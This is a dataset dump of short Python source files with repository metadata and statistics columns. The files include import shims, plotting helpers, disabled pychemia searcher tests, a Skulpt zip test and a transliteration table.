|
enthought/traits/protocols/generate.py
|
enthought/etsproxy
|
4aafd628611ebf7fe8311c9d1a0abcf7f7bb5347
|
[
"BSD-3-Clause"
] | null | null | null |
# proxy module
from traits.protocols.generate import *
| 18.333333
| 39
| 0.8
| 7
| 55
| 6.285714
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.127273
| 55
| 2
| 40
| 27.5
| 0.916667
| 0.218182
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
3e3a222baa801def196eaf026923f04923624ace
| 76
|
py
|
Python
|
drum/__init__.py
|
slmnv5/pepelats
|
044efa45be4c15289de9e300d681c2008af69962
|
[
"MIT"
] | 1
|
2022-01-06T02:51:25.000Z
|
2022-01-06T02:51:25.000Z
|
drum/__init__.py
|
slmnv5/pepelats
|
044efa45be4c15289de9e300d681c2008af69962
|
[
"MIT"
] | null | null | null |
drum/__init__.py
|
slmnv5/pepelats
|
044efa45be4c15289de9e300d681c2008af69962
|
[
"MIT"
] | 1
|
2021-12-01T20:52:21.000Z
|
2021-12-01T20:52:21.000Z
|
from drum._drumloader import DrumLoader
from drum._realdrum import RealDrum
| 25.333333
| 39
| 0.868421
| 10
| 76
| 6.4
| 0.5
| 0.25
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.105263
| 76
| 2
| 40
| 38
| 0.941176
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
e42476a56418b10ddff3d2e11030d3d0367d24b6
| 182
|
py
|
Python
|
tests/test_classical/__init__.py
|
ajaysub110/JigglypuffRL
|
083fd26d05b7eac018e6db7d32c4be4587461766
|
[
"MIT"
] | null | null | null |
tests/test_classical/__init__.py
|
ajaysub110/JigglypuffRL
|
083fd26d05b7eac018e6db7d32c4be4587461766
|
[
"MIT"
] | null | null | null |
tests/test_classical/__init__.py
|
ajaysub110/JigglypuffRL
|
083fd26d05b7eac018e6db7d32c4be4587461766
|
[
"MIT"
] | null | null | null |
from tests.test_classical.test_agents import TestAgents
from tests.test_classical.test_bandits import TestBandit
from tests.test_classical.test_common import TestModels, TestTrainer
| 45.5
| 68
| 0.89011
| 25
| 182
| 6.24
| 0.48
| 0.173077
| 0.25
| 0.423077
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.071429
| 182
| 3
| 69
| 60.666667
| 0.923077
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
e43d297d7653330e8b775af4c9cf22d1216372e1
| 149
|
py
|
Python
|
tools/utils.py
|
BobuxBot/BobuxAdmin
|
81786bbccd6a440de9e1f8599cbb7a53d5a1d3b2
|
[
"MIT"
] | 2
|
2022-02-08T17:06:39.000Z
|
2022-02-19T01:55:12.000Z
|
tools/utils.py
|
BobuxBot/BobuxAdmin
|
81786bbccd6a440de9e1f8599cbb7a53d5a1d3b2
|
[
"MIT"
] | 2
|
2022-02-09T07:32:38.000Z
|
2022-02-13T07:36:43.000Z
|
tools/utils.py
|
BobuxBot/BobuxAdmin
|
81786bbccd6a440de9e1f8599cbb7a53d5a1d3b2
|
[
"MIT"
] | null | null | null |
from datetime import timedelta, datetime
def to_discord_timestamp(delta: timedelta):
    """Render ``now + delta`` as a Discord ``<t:unix>`` timestamp tag.

    Discord clients display the tag as a localized date/time.
    NOTE(review): uses naive local ``datetime.now()``; ``timestamp()``
    interprets it in the local zone — confirm that is intended.
    """
    target = datetime.now() + delta
    unix_seconds = int(target.timestamp())
    return f"<t:{unix_seconds}>"
| 24.833333
| 61
| 0.724832
| 19
| 149
| 5.578947
| 0.736842
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.120805
| 149
| 5
| 62
| 29.8
| 0.80916
| 0
| 0
| 0
| 0
| 0
| 0.315436
| 0.295302
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 6
|
e458b8ab58a399bf110c1d57179939ad6057e7b1
| 2,381
|
py
|
Python
|
pychemia/searcher/tests/test_searcher_clusters.py
|
quanshengwu/PyChemia
|
98e9f7a1118b694dbda3ee75411ff8f8d7b9688b
|
[
"MIT"
] | 1
|
2021-03-26T12:34:45.000Z
|
2021-03-26T12:34:45.000Z
|
pychemia/searcher/tests/test_searcher_clusters.py
|
quanshengwu/PyChemia
|
98e9f7a1118b694dbda3ee75411ff8f8d7b9688b
|
[
"MIT"
] | null | null | null |
pychemia/searcher/tests/test_searcher_clusters.py
|
quanshengwu/PyChemia
|
98e9f7a1118b694dbda3ee75411ff8f8d7b9688b
|
[
"MIT"
] | null | null | null |
import unittest
class SearcherTest(unittest.TestCase):
    """Smoke tests for pychemia global searchers on Lennard-Jones clusters.

    NOTE(review): every method is prefixed ``notest_`` instead of ``test_``,
    so unittest discovery runs none of them — presumably disabled because
    they are slow and require a population database backend; confirm before
    renaming.  Each method follows the same pattern: build an LJ cluster
    population, run a searcher, clean the DB, and run again to exercise a
    fresh start on the same population.
    """
    def notest_harmony(self):
        """
        Tests (pychemia.searcher.harmony) with LJ Clusters :
        """
        import pychemia
        pychemia.pcm_log.debug('HarmonySearch')
        # 17-atom Xe Lennard-Jones cluster population.
        popu = pychemia.population.LJCluster('LJ', composition='Xe17')
        searcher = pychemia.searcher.HarmonySearch(popu, generation_size=16, stabilization_limit=5)
        searcher.run()
        # Wipe the population DB and run a second search from scratch.
        popu.pcdb.clean()
        searcher = pychemia.searcher.HarmonySearch(popu, generation_size=16, stabilization_limit=5)
        searcher.run()
    def notest_swarm(self):
        """
        Tests (pychemia.searcher.swarm) with LJ Clusters :
        """
        import pychemia
        pychemia.pcm_log.debug('ParticleSwarm')
        popu = pychemia.population.LJCluster('LJ', composition='Xe17')
        searcher = pychemia.searcher.ParticleSwarm(popu, generation_size=16, stabilization_limit=5)
        searcher.run()
        popu.pcdb.clean()
        searcher = pychemia.searcher.ParticleSwarm(popu, generation_size=16, stabilization_limit=5)
        searcher.run()
    def notest_firefly(self):
        """
        Tests (pychemia.searcher.firefly) with LJ Clusters :
        """
        import pychemia
        pychemia.pcm_log.debug('FireFly')
        popu = pychemia.population.LJCluster('LJ', composition='Xe17')
        searcher = pychemia.searcher.FireFly(popu, generation_size=16, stabilization_limit=5)
        searcher.run()
        popu.pcdb.clean()
        # Second run passes explicit FireFly hyper-parameters.
        searcher = pychemia.searcher.FireFly(popu,
                                             {'delta': 0.1,'gamma': 0.1, 'beta0': 0.8, 'alpha0': 0, 'multi_move': True},
                                             generation_size=16, stabilization_limit=5)
        searcher.run()
    def notest_genetic(self):
        """
        Tests (pychemia.searcher.genetic) with LJ Clusters :
        """
        import pychemia
        pychemia.pcm_log.debug('GeneticAlgorithm')
        popu = pychemia.population.LJCluster('LJ', composition='Xe17')
        searcher = pychemia.searcher.GeneticAlgorithm(popu, generation_size=16, stabilization_limit=5)
        searcher.run()
        popu.pcdb.clean()
        searcher = pychemia.searcher.GeneticAlgorithm(popu, generation_size=16, stabilization_limit=5)
        searcher.run()
| 37.203125
| 120
| 0.618228
| 236
| 2,381
| 6.131356
| 0.20339
| 0.132688
| 0.132688
| 0.160332
| 0.794057
| 0.781617
| 0.781617
| 0.781617
| 0.781617
| 0.651693
| 0
| 0.023604
| 0.270475
| 2,381
| 63
| 121
| 37.793651
| 0.809442
| 0.105418
| 0
| 0.65
| 0
| 0
| 0.051081
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.1
| false
| 0
| 0.125
| 0
| 0.25
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
e4e7047c6ab06c71f3fbc05897d44b3837769340
| 83
|
py
|
Python
|
test/run/t398.py
|
timmartin/skulpt
|
2e3a3fbbaccc12baa29094a717ceec491a8a6750
|
[
"MIT"
] | 2,671
|
2015-01-03T08:23:25.000Z
|
2022-03-31T06:15:48.000Z
|
test/run/t398.py
|
timmartin/skulpt
|
2e3a3fbbaccc12baa29094a717ceec491a8a6750
|
[
"MIT"
] | 972
|
2015-01-05T08:11:00.000Z
|
2022-03-29T13:47:15.000Z
|
test/run/t398.py
|
timmartin/skulpt
|
2e3a3fbbaccc12baa29094a717ceec491a8a6750
|
[
"MIT"
] | 845
|
2015-01-03T19:53:36.000Z
|
2022-03-29T18:34:22.000Z
|
# Skulpt runtime test: exercises zip() via Python 2 print statements.
# NOTE(review): Python 2 syntax — under py2 semantics zip() returns a list,
# so each line prints a list of tuples (empty for the last two calls).
print zip([8, 9, 10], [11, 12, 13])
print zip([1, 2, 3])
print zip()
print zip([])
| 16.6
| 35
| 0.542169
| 17
| 83
| 2.647059
| 0.647059
| 0.711111
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.191176
| 0.180723
| 83
| 4
| 36
| 20.75
| 0.470588
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 1
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 6
|
e4f70b504c346a484d8fe3a7d00e95d7176d3041
| 1,262
|
py
|
Python
|
src/statsplotter.py
|
gorcajo/spotify-dude
|
8c16960906bebf19673fec9c1477fc526259d024
|
[
"MIT"
] | null | null | null |
src/statsplotter.py
|
gorcajo/spotify-dude
|
8c16960906bebf19673fec9c1477fc526259d024
|
[
"MIT"
] | null | null | null |
src/statsplotter.py
|
gorcajo/spotify-dude
|
8c16960906bebf19673fec9c1477fc526259d024
|
[
"MIT"
] | null | null | null |
import matplotlib.pyplot as plt
import numpy as np
import uuid
from entities import Plottable
def plot_as_bar_graph(plottable):
    """Render *plottable* as an annotated bar chart and save it as a PNG.

    Args:
        plottable: object exposing ``x_axis``/``y_axis`` iterables plus
            ``title`` and ``ylabel`` attributes (see ``entities.Plottable``).

    Returns:
        Path of the temporary PNG file written under ``/tmp``.
    """
    # list() replaces the original element-by-element append loops;
    # the resulting lists are identical.
    x_axis = list(plottable.x_axis)
    y_axis = list(plottable.y_axis)
    y_pos = np.arange(len(x_axis))
    plt.bar(y_pos, y_axis, align="center", alpha=0.5)
    plt.xticks(y_pos, x_axis, rotation="vertical")
    plt.title(plottable.title)
    plt.ylabel(plottable.ylabel)
    # Label each bar with its numeric value.
    for i, j in zip(y_pos, y_axis):
        plt.annotate(j, xy=(i, j), ha="center")
    filename = "/tmp/" + str(uuid.uuid1()) + ".png"
    plt.savefig(filename, format="png")
    plt.clf()  # reset the shared pyplot figure so later plots start clean
    return filename
def plot_as_line_graph(plottable):
    """Render *plottable* as a line chart and save it as a PNG.

    Args:
        plottable: object exposing ``x_axis``/``y_axis`` iterables plus
            ``title`` and ``ylabel`` attributes (see ``entities.Plottable``).

    Returns:
        Path of the temporary PNG file written under ``/tmp``.
    """
    # list() replaces the original element-by-element append loops;
    # the resulting lists are identical.
    x_axis = list(plottable.x_axis)
    y_axis = list(plottable.y_axis)
    y_pos = np.arange(len(x_axis))
    plt.plot(y_pos, y_axis, alpha=0.5)
    plt.xticks(y_pos, x_axis, rotation="vertical")
    plt.title(plottable.title)
    plt.ylabel(plottable.ylabel)
    filename = "/tmp/" + str(uuid.uuid1()) + ".png"
    plt.savefig(filename, format="png")
    plt.clf()  # reset the shared pyplot figure so later plots start clean
    return filename
| 22.140351
| 53
| 0.637876
| 196
| 1,262
| 3.903061
| 0.260204
| 0.065359
| 0.073203
| 0.035294
| 0.760784
| 0.760784
| 0.760784
| 0.760784
| 0.760784
| 0.760784
| 0
| 0.006167
| 0.229002
| 1,262
| 56
| 54
| 22.535714
| 0.780062
| 0
| 0
| 0.736842
| 0
| 0
| 0.041204
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.052632
| false
| 0
| 0.105263
| 0
| 0.210526
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
90003c628f469812da1eb37b4b855239dbff7f07
| 68
|
py
|
Python
|
superstructure/infrastructure/storage/__init.py
|
MultifokalHirn/superstructure
|
61672613da627d8c1bbd9250ca83df1d99bb1194
|
[
"MIT"
] | 3
|
2020-06-06T13:03:25.000Z
|
2021-03-19T08:32:23.000Z
|
superstructure/infrastructure/storage/__init.py
|
MultifokalHirn/superstructure
|
61672613da627d8c1bbd9250ca83df1d99bb1194
|
[
"MIT"
] | 309
|
2020-06-06T14:49:03.000Z
|
2022-03-31T00:02:09.000Z
|
superstructure/infrastructure/storage/__init.py
|
MultifokalHirn/superstructure
|
61672613da627d8c1bbd9250ca83df1d99bb1194
|
[
"MIT"
] | 1
|
2020-06-09T11:18:00.000Z
|
2020-06-09T11:18:00.000Z
|
from .pickled import * # noqa # nosec
from .redis import * # noqa
| 22.666667
| 38
| 0.661765
| 9
| 68
| 5
| 0.666667
| 0.444444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.235294
| 68
| 2
| 39
| 34
| 0.865385
| 0.235294
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
901f937a05619811b0e9fa38fd2c77e9c142714d
| 37
|
py
|
Python
|
scormxblock/__init__.py
|
fccn/edx_xblock_scorm
|
ff4f6a8a498b5c32273b0960c3ff9de80c0afe50
|
[
"Apache-2.0"
] | 36
|
2016-04-18T20:27:41.000Z
|
2022-01-13T13:20:50.000Z
|
scormxblock/__init__.py
|
fccn/edx_xblock_scorm
|
ff4f6a8a498b5c32273b0960c3ff9de80c0afe50
|
[
"Apache-2.0"
] | 25
|
2016-05-30T15:13:36.000Z
|
2022-02-21T07:57:15.000Z
|
scormxblock/__init__.py
|
fccn/edx_xblock_scorm
|
ff4f6a8a498b5c32273b0960c3ff9de80c0afe50
|
[
"Apache-2.0"
] | 51
|
2016-04-26T19:35:15.000Z
|
2021-11-08T23:00:10.000Z
|
from .scormxblock import ScormXBlock
| 18.5
| 36
| 0.864865
| 4
| 37
| 8
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.108108
| 37
| 1
| 37
| 37
| 0.969697
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
5f7bf32403c4882d2106bf96ab7660945a2e7801
| 96
|
py
|
Python
|
venv/lib/python3.8/site-packages/future/moves/socketserver.py
|
Retraces/UkraineBot
|
3d5d7f8aaa58fa0cb8b98733b8808e5dfbdb8b71
|
[
"MIT"
] | 2
|
2022-03-13T01:58:52.000Z
|
2022-03-31T06:07:54.000Z
|
venv/lib/python3.8/site-packages/future/moves/socketserver.py
|
DesmoSearch/Desmobot
|
b70b45df3485351f471080deb5c785c4bc5c4beb
|
[
"MIT"
] | 19
|
2021-11-20T04:09:18.000Z
|
2022-03-23T15:05:55.000Z
|
venv/lib/python3.8/site-packages/future/moves/socketserver.py
|
DesmoSearch/Desmobot
|
b70b45df3485351f471080deb5c785c4bc5c4beb
|
[
"MIT"
] | null | null | null |
/home/runner/.cache/pip/pool/bf/c6/4b/bab0f11ce82cb9b626d6279f8e5a679c941cc7656e4541adf4508907d9
| 96
| 96
| 0.895833
| 9
| 96
| 9.555556
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.40625
| 0
| 96
| 1
| 96
| 96
| 0.489583
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
5fa2ac09c4ec100ad2bb57428fd0fe0f556c3198
| 343
|
py
|
Python
|
python/anyascii/_data/_01c.py
|
casept/anyascii
|
d4f426b91751254b68eaa84c6cd23099edd668e6
|
[
"ISC"
] | null | null | null |
python/anyascii/_data/_01c.py
|
casept/anyascii
|
d4f426b91751254b68eaa84c6cd23099edd668e6
|
[
"ISC"
] | null | null | null |
python/anyascii/_data/_01c.py
|
casept/anyascii
|
d4f426b91751254b68eaa84c6cd23099edd668e6
|
[
"ISC"
] | null | null | null |
# Transliteration table covering one 256-code-point Unicode block: a single
# space-separated string where each field is the ASCII replacement for one
# code point. NOTE(review): this looks like machine-generated anyascii data —
# do not hand-edit individual entries; regenerate instead.
b=" 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 a t g m l a k j m w i s h n r u c d n y e p d n r o t b n h m m ' , . v d o s t t ' e u A B G D E V Z T I K' L M N O P' Zh R S T' U P K Gh Q' Sh Ch Ts Dz Ts' Ch' Kh J H Ey Y W Q Ow F E ' G ' E \" W . * ; , L. K. D. B."
| 343
| 343
| 0.346939
| 108
| 343
| 1.101852
| 0.407407
| 0.033613
| 0.05042
| 0.067227
| 0.168067
| 0.168067
| 0.168067
| 0.168067
| 0.168067
| 0.168067
| 0
| 0.138889
| 0.580175
| 343
| 1
| 343
| 343
| 0.6875
| 0
| 0
| 0
| 0
| 1
| 0.918605
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
5faeb7fa13e72041e1ad1671dfa22265cd64cfd5
| 103
|
py
|
Python
|
libgcv/model/faster_rcnn/__init__.py
|
bhaveshbaranda/Human-Object-Relation-Network
|
8f358fa14fe14c7c02758359dce2a5c625be87c1
|
[
"MIT"
] | 2
|
2020-09-18T12:16:39.000Z
|
2021-07-08T01:41:33.000Z
|
libgcv/model/faster_rcnn/__init__.py
|
bhaveshbaranda/Human-Object-Relation-Network
|
8f358fa14fe14c7c02758359dce2a5c625be87c1
|
[
"MIT"
] | 2
|
2020-09-18T12:16:34.000Z
|
2021-07-15T05:33:26.000Z
|
libgcv/model/faster_rcnn/__init__.py
|
bhaveshbaranda/Human-Object-Relation-Network
|
8f358fa14fe14c7c02758359dce2a5c625be87c1
|
[
"MIT"
] | 6
|
2020-09-17T05:57:54.000Z
|
2021-07-15T05:34:01.000Z
|
"""Faster-RCNN Object Detection."""
from __future__ import absolute_import
from .faster_rcnn import *
| 20.6
| 38
| 0.786408
| 13
| 103
| 5.769231
| 0.615385
| 0.266667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.116505
| 103
| 4
| 39
| 25.75
| 0.824176
| 0.281553
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
081d10359a854427b08f208f142f6f43b5b2aee5
| 61
|
py
|
Python
|
src/lambda-python-example/handler.py
|
sbstjn/cdk-lambda-fleet
|
b2927c05786e78472648b1519bb5c82579b4e220
|
[
"MIT"
] | 17
|
2020-12-06T16:46:31.000Z
|
2021-06-16T18:00:21.000Z
|
src/lambda-python-example/handler.py
|
sbstjn/cdk-lambda-fleet
|
b2927c05786e78472648b1519bb5c82579b4e220
|
[
"MIT"
] | 3
|
2020-12-06T16:25:58.000Z
|
2021-03-04T21:28:18.000Z
|
src/lambda-python-example/handler.py
|
sbstjn/cdk-lambda-fleet
|
b2927c05786e78472648b1519bb5c82579b4e220
|
[
"MIT"
] | 3
|
2021-03-04T18:43:23.000Z
|
2021-06-16T18:00:23.000Z
|
import os
def run(event, context):
    """AWS Lambda entry point; ignores both arguments and reports completion."""
    message = 'Done: python'
    return message
| 15.25
| 25
| 0.688525
| 9
| 61
| 4.666667
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.196721
| 61
| 4
| 25
| 15.25
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0.193548
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 6
|
082185772645afae6441c2b9c8987447a68645ef
| 46
|
py
|
Python
|
utils/__init__.py
|
ijmbarr/pythonic-metal
|
da4b8a496fae3c9211d7f52338568a8e354cd94d
|
[
"MIT"
] | 23
|
2017-08-25T02:40:16.000Z
|
2021-05-13T01:29:40.000Z
|
utils/__init__.py
|
ijmbarr/pythonic-metal
|
da4b8a496fae3c9211d7f52338568a8e354cd94d
|
[
"MIT"
] | null | null | null |
utils/__init__.py
|
ijmbarr/pythonic-metal
|
da4b8a496fae3c9211d7f52338568a8e354cd94d
|
[
"MIT"
] | 6
|
2017-10-20T20:31:49.000Z
|
2021-02-20T22:03:25.000Z
|
import utils.tokenizer
import utils.colouring
| 15.333333
| 22
| 0.869565
| 6
| 46
| 6.666667
| 0.666667
| 0.55
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.086957
| 46
| 3
| 23
| 15.333333
| 0.952381
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
083838fb72d28de7dda2ea4a493dec51dad7c45c
| 26
|
py
|
Python
|
models/__init__.py
|
ackness/GazeFlow
|
ca6b7d548571f85af84bdec77292758ab5d36449
|
[
"MIT"
] | 12
|
2020-12-29T12:00:20.000Z
|
2022-02-07T08:26:24.000Z
|
models/__init__.py
|
ackness/GazeFlow
|
ca6b7d548571f85af84bdec77292758ab5d36449
|
[
"MIT"
] | 1
|
2022-02-12T11:26:20.000Z
|
2022-02-12T11:26:28.000Z
|
models/__init__.py
|
ackness/GazeFlow
|
ca6b7d548571f85af84bdec77292758ab5d36449
|
[
"MIT"
] | 2
|
2021-08-20T14:40:01.000Z
|
2022-01-02T10:32:04.000Z
|
from .gazeflow import Glow
| 26
| 26
| 0.846154
| 4
| 26
| 5.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.115385
| 26
| 1
| 26
| 26
| 0.956522
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
f235d82edec1bb6596fdc81d0194a1638935d708
| 26
|
py
|
Python
|
src/zuthaka/backendapi/services/ClassHandlers/Covenant/__init__.py
|
justinforbes/zuthaka
|
26b4d37c6e280ff16858f37882752e9d15eac817
|
[
"BSD-3-Clause"
] | 129
|
2021-08-05T21:10:35.000Z
|
2022-03-08T06:38:50.000Z
|
src/zuthaka/backendapi/services/ClassHandlers/Covenant/__init__.py
|
justinforbes/zuthaka
|
26b4d37c6e280ff16858f37882752e9d15eac817
|
[
"BSD-3-Clause"
] | 2
|
2021-08-20T06:11:16.000Z
|
2021-09-08T03:25:09.000Z
|
src/zuthaka/backendapi/services/ClassHandlers/Covenant/__init__.py
|
justinforbes/zuthaka
|
26b4d37c6e280ff16858f37882752e9d15eac817
|
[
"BSD-3-Clause"
] | 16
|
2021-08-06T01:01:20.000Z
|
2022-02-02T14:19:17.000Z
|
from .covenantc2 import *
| 13
| 25
| 0.769231
| 3
| 26
| 6.666667
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.045455
| 0.153846
| 26
| 1
| 26
| 26
| 0.863636
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
f2bab902292b34d83bcfa28be9ab722470895fb1
| 150
|
py
|
Python
|
alexa_skills/helpers/__init__.py
|
johnyob/Alexa-Skills
|
3679a887bb519042511a16fbb848254dc0ee43a0
|
[
"MIT"
] | null | null | null |
alexa_skills/helpers/__init__.py
|
johnyob/Alexa-Skills
|
3679a887bb519042511a16fbb848254dc0ee43a0
|
[
"MIT"
] | null | null | null |
alexa_skills/helpers/__init__.py
|
johnyob/Alexa-Skills
|
3679a887bb519042511a16fbb848254dc0ee43a0
|
[
"MIT"
] | null | null | null |
from alexa_skills.helpers.Constants import NON_PRIMATIVES
from alexa_skills.helpers.Util import Struct, is_dialog_complete, is_request_type, is_intent
| 75
| 92
| 0.886667
| 23
| 150
| 5.434783
| 0.695652
| 0.144
| 0.24
| 0.352
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.066667
| 150
| 2
| 92
| 75
| 0.892857
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
